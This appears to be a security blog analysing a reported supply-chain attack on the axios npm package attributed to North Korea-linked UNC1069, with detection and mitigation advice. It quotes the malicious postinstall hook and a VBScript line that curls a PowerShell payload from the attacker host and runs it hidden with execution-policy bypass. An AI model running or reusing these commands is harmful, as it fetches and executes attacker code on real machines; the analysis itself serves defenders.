Ever wonder why your next ‘npm install axios’ might summon a North Korean backdoor straight to your dev machine?
North Korea-nexus threat actor UNC1069 just pulled off a textbook supply chain attack on Axios NPM package—the JavaScript HTTP library with over 100 million weekly downloads. On March 31, 2026, between 00:21 and 03:20 UTC, they slipped a malicious dependency, plain-crypto-js version 4.2.1, into axios releases 1.14.1 and 0.30.4. Google’s Threat Intelligence Group nailed the attribution: same WAVESHAPER.V2 backdoor this crew’s wielded since 2018, plus overlapping infrastructure.
It’s not just any hack. This one’s surgically precise, exploiting the blind trust devs place in package maintainers. Compromised the axios account—email flipped to [email protected]—and boom, postinstall hook in package.json fires silently.
“scripts”: { “test”: “echo "Error: no test specified" && exit 1”, “postinstall”: “node setup.js” }
That snippet? Pure stealth. NPM runs it automatically post-install, no questions asked. Setup.js (SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09)—an obfuscated dropper called SILKBELL—sniffs your OS, XOR-decrypts C2 URLs, and drops platform-specific hell.
How UNC1069 Made Axios Their Trojan Horse
Look, supply chain hits aren’t new—SolarWinds still haunts us—but this? North Korea’s pivot from pure espionage to financially motivated grabs via open source. UNC1069’s been at it since 2018, but WAVESHAPER.V2 marks an upgrade: cross-platform C++ backdoor that enums dirs, grabs system info, executes commands. Why now? Cash-strapped regimes eyeing crypto heists, and JS ecosystem’s a sitting duck—low barriers, high reach.
The dropper’s clever. Dynamically imports fs, os, execSync to dodge static scans. Deletes itself, swaps package.json back from a stashed ‘package.md’. Forensic ninjutsu.
Windows path: Hunts powershell.exe, copies to %PROGRAMDATA%\wt.exe. Curls a PS script from sfrclak[.]com:8000 (POST body: packages.npm.org/product1), runs it hidden via copied Windows Terminal—bypass execution policy, no traces.
Set objShell = CreateObject(“WScript.Shell”) objShell.Run “cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 > %TEMP%\6202033.ps1 & %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 http://sfrclak[.]com:8000/6202033 & del ""PS_PATH"" /f”, 0, False
MacOS? Bash-curl grabs Mach-O binary to /Library/Caches/com.apple.act.mond (product0 body), chmods it, zsh-launches backgrounded. Linux: Python backdoor to /tmp/ld.py (product2).
Cleanup’s obsessive—rm’s temps, unlinks self. But here’s my take, the one GTIG glosses over: this isn’t isolated DPRK opportunism. It’s a blueprint for state-sponsored supply chain cannibalism. Remember NotPetya? Started targeted, went pandemic. UNC1069’s financial angle (crypto grabs, likely) means they’re not burning bridges—they’re farming ‘em long-term. Bold prediction: by 2027, we’ll see NPM’s top 10 routinely vetted like nuclear codes.
Why Did Axios Fall So Easily—and Could It Be You?
Maintainer compromise. Simple as that. Email hijack, no 2FA mentioned (classic NPM blind spot pre-2023 reforms, but gaps linger). Axios? Ubiquitous in React apps, Node servers—your bank’s API calls, that SaaS dashboard, all potentially lit up.
But dig deeper: architectural rot in NPM. Postinstall hooks? Convenience turned weapon since 2017’s ua-parser-js fiasco. Millions download blindly—yarn audit or npm audit miss runtime hooks. Dependency hell amplifies: transitive pulls mean one bad apple poisons thousands.
GTIG’s Mandiant crew details IOCs—I admire the thoroughness—but their PR spin undersells the why. NPM’s 2M+ packages, volunteer-driven, no universal sig checks. North Korea bets on volume: hit a whale like Axios, collateral’s your entire cloud.
Defenders, listen up. Audit installs: npm ls [email protected] or 0.30.4. Grep node_modules for plain-crypto-js. YARA for setup.js hash. Block sfrclak[.]com:8000. Lock deps with package-lock.json, use sigstore for verified pubs. Tools like Socket.dev or OSS Review Toolkit—deploy ‘em now.
Is This the New Normal for Open Source Supply Chains?
Short answer: yes. And it’s terrifying.
We’ve shifted from perimeter defense to… what? Dependency diplomacy? EU’s Cyber Resilience Act mandates supplier audits by ‘25—too late for this. US exec order post-SolarWinds? Toothless on foreign maintainers.
Unique angle: parallel to Stuxnet’s USB vectors, but digital. DPRK’s not just probing—they’re monetizing flaws at scale. Critique GTIG’s blog: great tech deep-dive, but zero on policy. Why no NPM hall-of-fame for compromised pkgs? Shame works.
Dev shift needed. Ditch runtime hooks enterprise-wide. Sig-based installs mandatory. Tools like Dependabot alerts? Step up to behavioral sims.
This attack exposes JS’s fragility—client-side trust in a server-side world. Fix it, or watch nation-states turn your toolbox into theirs.
🧬 Related Insights
- Read more: Coffee Machine Catastrophe: The Breakroom Breach That Owned a Company
- Read more: Your Pentest Bot Went Quiet: The Hidden Gaps Killing Your Security
Frequently Asked Questions
What is the Axios NPM supply chain attack?
North Korea’s UNC1069 compromised axios versions 1.14.1 and 0.30.4, injecting plain-crypto-js to drop WAVESHAPER.V2 backdoor via postinstall.
How do I check if my project has the malicious Axios?
Run ‘npm ls axios’—flag 1.14.1/0.30.4. Scan for plain-crypto-js or sfrclak.com IOCs. Update to patched versions immediately.
Will North Korean hackers target more NPM packages?
Absolutely—financial motives plus easy access mean top libs are prime. Vet deps rigorously; expect copycats.
